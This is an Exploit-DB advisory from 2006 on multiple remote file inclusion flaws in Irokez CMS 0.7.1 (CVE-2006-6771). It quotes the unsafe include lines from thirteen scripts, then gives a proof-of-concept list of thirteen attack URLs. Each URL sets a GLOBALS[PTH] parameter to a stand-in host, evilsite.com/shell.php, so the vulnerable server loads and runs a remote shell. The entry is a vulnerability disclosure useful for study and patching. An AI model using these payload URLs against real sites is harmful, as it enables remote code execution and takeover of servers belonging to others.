Irokez CMS <= 0.7.1 - Multiple Remote File Include Vulnerabilities

2006-12-25T00:00:00
ID EDB-ID:3007
Type exploitdb
Reporter nuffsaid
Modified 2006-12-25T00:00:00

Description

Irokez CMS <= 0.7.1 Multiple Remote File Include Vulnerabilities. CVE-2006-6771. Webapps exploit for php platform

                                        
                                            +-------------------------------------------------------------------------------------------
+ Irokez CMS &lt;= 0.7.1 Multiple Remote File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Vendor ............: http://www.irokez.org/
+ Affected Software .: Irokez CMS &lt;= 0.7.1
+ Download ..........: http://www.irokez.org/releases/irokez-0.7.1.zip
+ Description .......: "Irokez is a blogging based CMS"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid &lt;nuffsaid[at]newbslove.us&gt;
+-------------------------------------------------------------------------------------------
+ Details:
+ Irokez CMS has several scripts which do not initialize variables before using them to include
+ files, assuming register_globals = on, we can initialize any one of the variables in a query
+ string and include a remote file of our choice.
+
+ Vulnerable Code:
+ scripts/gallery.scr.php, line(s) 11-12:
+ -&gt; 11: require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
+ -&gt; 12: require_once "{$GLOBALS['PTH']['classes']}gallery.class.php";
+ scripts/sitemap.scr.php, line(s) 13:
+ -&gt; 13: include_once $GLOBALS['PTH']['classes'] . 'menu.class.php';
+ scripts/news.scr.php, line(s) 11:
+ -&gt; 11: require_once $GLOBALS['PTH']['classes'] . 'news.class.php';
+ scripts/polls.scr.php, line(s) 03:
+ -&gt; 03: require_once $GLOBALS['PTH']['classes'] . 'poll.class.php';
+ scripts/rss.scr.php, line(s) 04:
+ -&gt; 04: require_once "{$GLOBALS['PTH']['classes']}news.class.php";
+ scripts/search.scr.php, line(s) 04:
+ -&gt; 04: require_once "{$GLOBALS['PTH']['classes']}content.class.php";
+ scripts/xtextarea.scr.php, line(s) 03-04:
+ -&gt; 03: $GLOBALS['spaw_root'] = $spaw_root = $GLOBALS['PTH']['spaw'];
+ -&gt; 04: require_once $GLOBALS['PTH']['spaw'] . 'spaw_control.class.php';
+ functions/form.func.php, line(s) 03:
+ -&gt; 03: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
+ functions/general.func.php, line(s) 06:
+ -&gt; 06: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";  //TBL_Lang description
+ functions/groups.func.php, line(s) 03:
+ -&gt; 03: require_once "{$GLOBALS['PTH']['classes']}group.class.php";
+ functions/js.func.php, line(s) 04:
+ -&gt; 04: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
+ functions/sections.func.php, line(s) 03:
+ -&gt; 03: require_once "{$GLOBALS['PTH']['classes']}section.class.php";
+ functions/users.func.php, line(s) 03:
+ -&gt; 03: require_once "{$GLOBALS['PTH']['classes']}user.class.php";
+
+ Proof Of Concept:
+ http://[target]/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/news.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/polls.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/rss.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/search.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/form.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/general.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/groups.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/js.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/sections.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/users.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-12-25]